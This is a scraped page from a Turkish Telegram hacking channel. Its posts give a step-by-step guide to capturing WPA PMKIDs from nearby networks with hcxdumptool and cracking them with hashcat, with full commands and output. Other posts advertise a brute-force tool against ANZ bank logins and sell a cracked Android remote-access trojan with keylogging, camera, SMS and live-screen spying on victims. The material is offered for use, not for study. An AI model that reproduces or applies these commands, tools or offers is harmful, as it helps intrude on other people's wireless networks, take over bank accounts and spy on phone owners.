Get Mystery Box with random crypto!

🔰 VİP BİLGİ 🔰

Telgraf kanalının logosu vipbilgiler — 🔰 VİP BİLGİ 🔰 V
Telgraf kanalının logosu vipbilgiler — 🔰 VİP BİLGİ 🔰
Kanal adresi: @vipbilgiler
Kategoriler: teknolojiler
Dilim: Türk
aboneler: 72
Kanaldan açıklama

Hack Arşivleri İnstagram Takipçi Hileleri Hileli Oyunlar(Online-Offline) Ücretsiz Udemy Kursları

Ratings & Reviews

2.00

2 reviews

Reviews can be left only by registered users. All reviews are moderated by admins.

5 stars

0

4 stars

0

3 stars

1

2 stars

0

1 stars

1


En son Mesajlar 22

2021-06-25 15:26:16 Adım 5

Hashcat ile bir Parola Listesi ve Brute Force seçin

Yakaladığımız hashlere saldırmaya başlamak için iyi bir şifre listesi seçmemiz gerekecek. SecList koleksiyonunda yeniden başlamak için birkaç iyi şifre listesi bulabilirsiniz. Bir parola listeniz olduğunda, onu az önce dönüştürdüğünüz .16800 dosyasıyla aynı klasöre koyun ve ardından aşağıdaki komutu bir terminal penceresinde çalıştırın

~# hashcat -m 16800 galleriaHC.16800 -a 0 --kernel-accel=1 -w 4 --force 'topwifipass.txt'


Bu komutta, WPA-PMKID-PBKDF2 ağ protokollerine saldırmak için Hashcat'i 16800 modunda başlatıyoruz. Ardından, kırmak istediğimiz dosyanın adını belirleyeceğiz, bu durumda "galleriaHC.16800." -a bayrağı, hangi saldırı türlerinin kullanılacağını bize bildirir, bu durumda, "düz" bir saldırıdır ve ardından -w ve --kernel-accel=1 işaretleri en yüksek performanslı iş yükü profilini belirtir. Bilgisayarınızda performans sorunları varsa, -w argümanındaki sayıyı azaltabilirsiniz.
Ardından, --force seçeneği, saldırıya devam etmek için herhangi bir uyarıyı yok sayar ve komutun son kısmı, dosyamızdaki PMKID'leri kaba kuvvete zorlamak için kullandığımız şifre listesini belirtir, bu durumda "topwifipass. Txt."


hashcat (v4.2.1) starting... OpenCL Platform #1: The pocl project ==================================== * Device #1: pthread-AMD A8-6410 APU with AMD Radeon R5 Graphics, 2553/2553 MB allocatable, 4MCU Hashes: 21 digests; 21 unique digests, 20 unique salts Bitmaps: 16 bits, 65536 entries, 0x0000ffff mask, 262144 bytes, 5/13 rotates Rules: 1 Applicable optimizers: * Zero-Byte * Slow-Hash-SIMD-LOOP Minimum password length supported by kernel: 8 Maximum password length supported by kernel: 63 Watchdog: Hardware monitoring interface not found on your system. Watchdog: Temperature abort trigger disabled. * Device #1: build_opts '-cl-std=CL1.1 -I OpenCL -I /usr/share/hashcat/OpenCL -D VENDOR ID=64 -D CUDA_ARCH=0 -D AMD_ROCM=0 -D VECT_SIZE=4 -D DEVICE_TYPE=2 -D DGST_R0=0 -D DGST_R1=1 -D DGST_R2=2 -D DGST_R3=3 -D DGST_ELEM=4 -D KERN_TYPE=16800 -D _unroll' Dictionary cache hit: * Filename..: topwifipass.txt * Passwords.: 4801 * Bytes.....: 45277 * Keyspace..: 4801 [s]tatus [p]ause [b]ypass [c]heckpoint [q]uit =>


Donanım hızınıza ve parola listenizin boyutuna bağlı olarak, bu işlemin tamamlanması biraz zaman alabilir. Durumu istediğiniz zaman görmek için güncelleme için S tuşuna basabilirsiniz
23 viewsA Z R A İ L , 12:26
Aç / Yorum Yap
2021-06-25 15:24:13 4. Adım

Hashcat için Dökümü Dönüştürmek için Hxcpcaptool kullanın

PCAPNG dosyamızı dönüştürmek için, belirtilen birkaç argümanla hcxpcaptool kullanacağız. .PCAPNG dosyanızın kaydedildiği klasörde, bir terminal penceresinde aşağıdaki komutu çalıştırın

~# hcxpcaptool -E essidlist -I identitylist -U usernamelist -z galleriaHC.16800 galleria.pcapng



Bu komut, hxcpcaptool'a dosyada bulunan bilgileri Hashcat'in -E, -I ve -U bayraklarıyla anlamasına yardımcı olmak için kullanmasını söyler. -Z bayrağı, Hashcat'in kullanması için yeni dönüştürülen dosyanın adı için kullanılır ve komutun son kısmı dönüştürmek istediğimiz PCAPNG dosyasıdır.

Komutu çalıştırmak bize aşağıdakileri göstermelidir

summary: -------- file name....................: galleria.pcapng file type....................: pcapng 1.0 file hardware information....: x86_64 file os information..........: Linux 4.18.0-kali2-amd64 file application information.: hcxdumptool 4.2.1 network type.................: DLT_IEEE802_11_RADIO (127) endianess....................: little endian read errors..................: flawless packets inside...............: 1089 skipped packets..............: 0 packets with GPS data........: 0 packets with FCS.............: 732 beacons (with ESSID inside)..: 49 probe requests...............: 26 probe responses..............: 40 association requests.........: 103 association responses........: 204 reassociation requests.......: 2 reassocaition responses......: 7 authentications (OPEN SYSTEM): 346 authentications (BROADCOM)...: 114 authentications (APPLE)......: 1 EAPOL packets................: 304 EAPOL PMKIDs.................: 21 best handshakes..............: 4 (ap-less: 1) 21 PMKID(s) written to galleriahC.16800


Burada, kısa sürede 21 PMKID topladığımızı görebiliriz. Artık ağ şifrelerini kırmayı denemek için Hashcat'teki "galleriaHC.16800" dosyasını kullanabiliriz
22 viewsA Z R A İ L , 12:24
Aç / Yorum Yap
2021-06-25 15:02:29 İşim çıktı 5dk geliyorum devam Edecz
22 viewsA Z R A İ L , 12:02
Aç / Yorum Yap
2021-06-25 15:02:11 Aşama 3

Yerel Ağlardan PMKID'leri Yakalamak için Hxcdump Kullanın

Artık saldırmayı denemek istediğimiz cihazların PMKID'lerini yakalamaya hazırız. Kablosuz ağ bağdaştırıcımız "wlan1mon" olarak monitör modundayken saldırıyı başlatmak için aşağıdaki komutu uygulayacağız.

~# hcxdumptool -i wlan1mon -o galleria.pcapng --enable__status=1

Bunu parçalara ayırarak, -i programa hangi arayüzü kullandığımızı söyler, bu durumda wlan1mon. Sonuçları kaydedeceğimiz dosya adı -o bayrak bağımsız değişkeni ile belirtilebilir. Taramak istediğimiz kanal, -c işareti ve ardından taranacak kanalın numarası ile belirtilebilir.


Yukarıdaki komutumuzda, yakalanan PMKID'leri "galleria.pcapng" adlı bir dosyaya kaydetmek için wlan1mon kullanıyoruz. Başka bir durum değeri belirtebilseniz de 1 dışında herhangi bir değerle yakalamayı başaramadım

warning: NetworkManager is running with pid 555 warning: wpa_supplicant is running with pid 611 warning: wlan1mon is probably a monitor interface start capturing (stop with ctrl+c) INTERFACE:...............: wlan1mon FILTERLIST...............: 0 entries MAC CLIENT...............: fcc233ca8bc5 MAC ACCESS POINT.........: 10ae604b9e82 (incremented on every new client) EAPOL TIMEOUT............: 150000 REPLAYCOUNT..............: 62439 ANONCE...................: d8dd2206c82ad030e843a39e8f99281e215492dbef56f693cd882d4dfcde9956 [22:17:32 - 001] c8b5adb615ea -> fcc233ca8bc5 [FOUND PMKID CLIENT-LESS] [22:17:32 - 001] c8b5adb615e9 -> fcc233ca8bc5 [FOUND PMKID CLIENT-LESS] [22:17:33 - 001] 2c95694f3ca0 -> fcc233ca8bc5 [FOUND PMKID CLIENT-LESS] [22:17:33 - 001] 2c95694f3ca0 -> b4b686abc81a [FOUND PMKID] [22:17:48 - 011] 14edbb9938ea -> fcc233ca8bc5 [FOUND PMKID CLIENT-LESS] [22:17:48 - 011] 88964e3a8ea0 -> fcc233ca8bc5 [FOUND PMKID CLIENT-LESS] [22:17:49 - 011] dc7fa425888a -> fcc233ca8bc5 [FOUND PMKID CLIENT-LESS] [22:17:51 - 011] 88964e801fa0 -> fcc233ca8bc5 [FOUND PMKID CLIENT-LESS] [22:17:57 - 001] 9822efc6fdff -> ba634d3eb80d [EAPOL 4/4 - M4 RETRY ATTACK] [22:17:57 - 001] 9822efc6fdff -> ba634d3eb80d [FOUND HANDSHAKE AP-LESS, EAPOL TIMEOUT 6696] [22:18:04 - 011] 803773defd01 -> fcc233ca8bc5 [FOUND PMKID CLIENT-LESS] [22:19:21 - 011] 14edbb9ba0e6 -> 803773defd01 [FOUND AUTHORIZED HANDSHAKE, EAPOL TIMEOUT 15247] [22:19:34 - 006] 0618d629465b -> 58fb8433aac2 [FOUND AUTHORIZED HANDSHAKE, EAPOL TIMEOUT 2832] [22:19:42 - 005] e0220203294e -> fcc233ca8bc5 [FOUND PMKID CLIENT-LESS] [22:19:57 - 011] 14edbb9ba0e6 -> fcc233ca8bc5 [FOUND PMKID CLIENT-LESS] [22:20:02 - 008] 14edbbd29326 -> fcc233ca8bc5 [FOUND PMKID CLIENT-LESS] [22:20:04 - 008] 1c872c707c60 -> 78e7d17791e7 [FOUND PMKID] [22:20:11 - 009] e0220453a576 -> fcc233ca8bc5 [FOUND PMKID CLIENT-LESS] [22:20:27 - 001] ace2d32602da -> c8665d5dd654 [FOUND HANDSHAKE AP-LESS, EAPOL TIMEOUT 5202] INFO: cha=2, rx=32752, rx(dropped)=2801, tx=2205, powned=18, err=0

Uyarı: NetworkManager pid 555 ile çalışıyor uyarı: wpa_supplicant pid 611 ile çalışıyor uyarı: wlan1mon muhtemelen yakalamaya başlayan bir monitör arayüzüdür (
Yeterince topladığınızda, saldırıyı sonlandırmak için Control-C yazarak programı durdurabilirsiniz. Bu, kaba kuvvet saldırısı girişiminde bulunmamız için gereken bilgileri içeren bir PCAPNG dosyası üretmelidir, ancak bunu Hashcat'in anlayabileceği bir biçime dönüştürmemiz gerekecek
23 viewsA Z R A İ L , 12:02
Aç / Yorum Yap
2021-06-25 14:55:41 Adım 2

Kablosuz Ağ Bağdaştırıcısını Hazırlayın

Kali uyumlu kablosuz ağ adaptörünüzü taktıktan sonra ifconfig veya ip a yazarak adı bulabilirsiniz. Tipik olarak, wlan0 gibi bir ad verilir. İlk adım, kartı kablosuz monitör moduna geçirerek yakındaki Wi-Fi trafiğini dinlememizi sağlayacak.
Bunu yapmak için, kablosuz ağ bağdaştırıcınızın adını wlan0 ile değiştirerek bir terminal penceresine aşağıdaki komutu yazın.


~# airmon-ng start wlan0 Found 3 processes that could cause trouble Kill them using 'airmon-ng check kill' before putting the card in monitor mode, they will interfere by changing channels and sometimes putting the interface back in managed mode PID Name 555 NetworkManager 611 wpa_supplicant 6636 dhclient PHY Interface Driver Chipset phy0 wlan0 ath9k Qualcomm Atheros QCA9565 / AR9565 Wireless Network Adapter (rev 01) (mac80211 monitor mode vif enabled for [phy0]wlan0 on [phy0]wlan0mon) (mac80211 station mode vif disabled for [phy0]wlan0) phy1 wlan1 ath9k_htc Atheros Communications, Inc. AR9271 802.11n


Artık kablosuz ağ bağdaştırıcınız "wlan0mon" gibi bir ada sahip olmalı ve monitör modunda olmalıdır. Bunu, ifconfig'i tekrar çalıştırarak onaylayabilirsiniz
21 viewsA Z R A İ L , 11:55
Aç / Yorum Yap
2021-06-25 14:53:29 ~# cd hcxtools ~/hcxtools# make mkdir -p .deps cc -O3 -Wall -Wextra -std=gnu99 -MMD -MF .deps/hcxpcapngtool.d -o hcxpcapngtool hcxpcapngtool.c -lz -lcrypto cc -O3 -Wall -Wextra -std=gnu99 -MMD -MF .deps/hcxhashtool.d -o hcxhashtool hcxhashtool.c -lcrypto -lcurl cc -O3 -Wall -Wextra -std=gnu99 -MMD -MF .deps/hcxpsktool.d -o hcxpsktool hcxpsktool.c -lcrypto cc -O3 -Wall -Wextra -std=gnu99 -MMD -MF .deps/hcxwltool.d -o hcxwltool hcxwltool.c cc -O3 -Wall -Wextra -std=gnu99 -MMD -MF .deps/wlancap2wpasec.d -o wlancap2wpasec wlancap2wpasec.c -lcurl cc -O3 -Wall -Wextra -std=gnu99 -MMD -MF .deps/whoismac.d -o whoismac whoismac.c -lcurl cc -O3 -Wall -Wextra -std=gnu99 -MMD -MF .deps/hcxpmkidtool.d -o hcxpmkidtool hcxpmkidtool.c -lcrypto -lpthread cc -O3 -Wall -Wextra -std=gnu99 -MMD -MF .deps/wlanhcx2john.d -o wlanhcx2john wlanhcx2john.c cc -O3 -Wall -Wextra -std=gnu99 -MMD -MF .deps/hcxpcaptool.d -o hcxpcaptool hcxpcaptool.c -lz -lcrypto cc -O3 -Wall -Wextra -std=gnu99 -MMD -MF .deps/hcxhashcattool.d -o hcxhashcattool hcxhashcattool.c -lcrypto -lpthread cc -O3 -Wall -Wextra -std=gnu99 -MMD -MF .deps/hcxmactool.d -o hcxmactool hcxmactool.c cc -O3 -Wall -Wextra -std=gnu99 -MMD -MF .deps/hcxessidtool.d -o hcxessidtool hcxessidtool.c cc -O3 -Wall -Wextra -std=gnu99 -MMD -MF .deps/hcxhash2cap.d -o hcxhash2cap hcxhash2cap.c cc -O3 -Wall -Wextra -std=gnu99 -MMD -MF .deps/wlanhc2hcx.d -o wlanhc2hcx wlanhc2hcx.c cc -O3 -Wall -Wextra -std=gnu99 -MMD -MF .deps/wlanwkp2hcx.d -o wlanwkp2hcx wlanwkp2hcx.c cc -O3 -Wall -Wextra -std=gnu99 -MMD -MF .deps/wlanhcxinfo.d -o wlanhcxinfo wlanhcxinfo.c cc -O3 -Wall -Wextra -std=gnu99 -MMD -MF .deps/wlanhcx2ssid.d -o wlanhcx2ssid wlanhcx2ssid.c cc -O3 -Wall -Wextra -std=gnu99 -MMD -MF .deps/wlanhcxcat.d -o wlanhcxcat wlanhcxcat.c -lcrypto cc -O3 -Wall -Wextra -std=gnu99 -MMD -MF .deps/wlanpmk2hcx.d -o wlanpmk2hcx wlanpmk2hcx.c -lcrypto cc -O3 -Wall -Wextra -std=gnu99 -MMD -MF .deps/wlanjohn2hcx.d -o wlanjohn2hcx wlanjohn2hcx.c cc -O3 -Wall -Wextra -std=gnu99 -MMD -MF .deps/wlancow2hcxpmk.d -o wlancow2hcxpmk wlancow2hcxpmk.c ~/hcxtools# make install install -m 0755 -D hcxpcapngtool /usr/local/bin/hcxpcapngtool install -m 0755 -D hcxhashtool /usr/local/bin/hcxhashtool install -m 0755 -D hcxpsktool /usr/local/bin/hcxpsktool install -m 0755 -D hcxwltool /usr/local/bin/hcxwltool install -m 0755 -D wlancap2wpasec /usr/local/bin/wlancap2wpasec install -m 0755 -D whoismac /usr/local/bin/whoismac install -m 0755 -D hcxpmkidtool /usr/local/bin/hcxpmkidtool install -m 0755 -D wlanhcx2john /usr/local/bin/wlanhcx2john install -m 0755 -D hcxpcaptool /usr/local/bin/hcxpcaptool install -m 0755 -D hcxhashcattool /usr/local/bin/hcxhashcattool install -m 0755 -D hcxmactool /usr/local/bin/hcxmactool install -m 0755 -D hcxessidtool /usr/local/bin/hcxessidtool install -m 0755 -D hcxhash2cap /usr/local/bin/hcxhash2cap install -m 0755 -D wlanhc2hcx /usr/local/bin/wlanhc2hcx install -m 0755 -D wlanwkp2hcx /usr/local/bin/wlanwkp2hcx install -m 0755 -D wlanhcxinfo /usr/local/bin/wlanhcxinfo install -m 0755 -D wlanhcx2ssid /usr/local/bin/wlanhcx2ssid install -m 0755 -D wlanhcxcat /usr/local/bin/wlanhcxcat install -m 0755 -D wlanpmk2hcx /usr/local/bin/wlanpmk2hcx install -m 0755 -D wlanjohn2hcx /usr/local/bin/wlanjohn2hcx install -m 0755 -D wlancow2hcxpmk /usr/local/bin/wlancow2hcxpmk



Son olarak, varsayılan olarak Kali Linux deposuna dahil olduğu için kolay olması gereken Hashcat'i kurmamız gerekecek. Hashcat'in en son sürümünü yüklemek için aşağıdakini yazmanız yeterlidir

~/hcxtools# cd ~# apt install hashcat Reading package lists... Done Building dependency tree Reading state information... Done hashcat is already the newest version (5.1.0+ds1-1). The following packages were automatically installed and are no longer required: libdouble-conversion1 liblinear3 Use 'apt autoremove' to remove them. 0 upgraded, 0 newly installed, 0 to remove and 1863 not upgraded

Bu tamamlandığında, kablosuz ağ bağdaştırıcısının kurulumuna geçebiliriz

.
21 viewsA Z R A İ L , 11:53
Aç / Yorum Yap
2021-06-21 23:12:33 Bugünlük Yeter Yarın CIA Hackleriz :))))
50 viewsA Z R A İ L , 20:12
Aç / Yorum Yap
2021-06-21 23:11:47 ANZ.Com Bank Brute

Kategoriler:

#Hacking + BankHacking Aracı
Format : Kullanıcı adı : Şifre Boyut : 900.6KB
Hedef: Sonraki Araç İçin 70+ Tepki
[●]Combo - Kullanılacak kimlik bilgilerinin listesi
[●]Proxy - Proxy ayarları
[●]Başlat - Kaba zorlamayı başlat [●]Dur - Kaba zorlamayı durdur [●]Combo - Eklenen listede bulunan kimlik bilgilerinin sayısını verir
[●]Proxy - Proxy listesi
[●]İyi - Kaç tanesi başarılı oldu
[●]Kötü - Kaç tanesi başarısız oldu
[●]Hata - Kaç tanesinde hata var


Fɪʀsᴛ Oɴ Tᴇʟᴇɢʀᴀᴍ
53 viewsA Z R A İ L , 20:11
Aç / Yorum Yap
2021-06-21 23:09:23 MOBIHOK V6 ANDROID FUD Sıçan Çatladı

Fiyat : 550$

Özellikler :

[●]Android'in tüm sürümlerini destekledi
[●]FUD yükü oluşturur
[●]Kurban canlı ekran kaydı akışı
[●]Yükü başka bir apk ile bağla
[●]Kalıcı yük
[●]Sosyal Medya kimlik avı sayfaları
[●]Kararlı bağlantı
[●]Kullanımı kolay
[●]Dosya yöneticisi
[●]SMS yöneticisi
[●]Arama yöneticisi
[●]Kişiler yöneticisi
[●]Konum yöneticisi
[●]Hesap yöneticisi
[●]Kamera yöneticisi
[●]Kurbanların canlı ekran görüntüsü
[●]Kabuk terminali
[●]Uygulama
[●]Kurbanların telefonuna doğrudan başka bir apk yükleyin
[●]Mikrofon
[●]Keylogger
[●]Ayarlar
[●]Kurban
[●]Telefon

Fɪʀsᴛ Oɴ Tᴇʟᴇɢʀᴀᴍ
50 viewsA Z R A İ L , 20:09
Aç / Yorum Yap
2021-06-21 23:03:33
51 viewsA Z R A İ L , 20:03
Aç / Yorum Yap